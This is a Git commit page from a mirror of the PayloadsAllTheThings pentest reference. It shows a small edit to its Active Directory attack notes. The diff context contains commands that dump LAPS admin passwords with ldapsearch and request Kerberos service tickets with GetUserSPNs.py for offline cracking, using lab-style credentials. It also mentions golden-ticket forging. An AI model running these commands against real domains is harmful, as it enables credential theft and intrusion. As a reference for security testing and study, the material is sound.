ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-18 18:36:10 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Update Active Directory Attack.md

Browse Source
This commit is contained in:
p0dalirius 2021-10-06 08:54:16 +02:00
parent e0b8bee5a6
commit 19b4bee7a0
1 changed files with 2 additions and 4 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
Methodology and Resources/Active Directory Attack.md
View File

@ -1343,8 +1343,6 @@ Get-AuthenticodeSignature 'c:\program files\LAPS\CSE\Admpwd.dll'
ldapsearch -x -h  -D "@" -w  -b "dc=<>,dc=<>,dc=<>" "(&(objectCategory=computer)(ms-MCS-AdmPwd=*))" ms-MCS-AdmPwd`
```
### Pass-the-Ticket Golden Tickets
Forging a TGT require the `krbtgt` NTLM hash
@ -1457,7 +1455,7 @@ Mitigations:
Any valid domain user can request a kerberos ticket (TGS) for any domain service. Once the ticket is received, password cracking can be done offline on the ticket to attempt to break the password for whatever user the service is running as.
* `GetUserSPNs` from Impacket Suite
* [GetUserSPNs](https://github.com/SecureAuthCorp/impacket/blob/master/examples/GetUserSPNs.py) from Impacket Suite
```powershell
$ GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request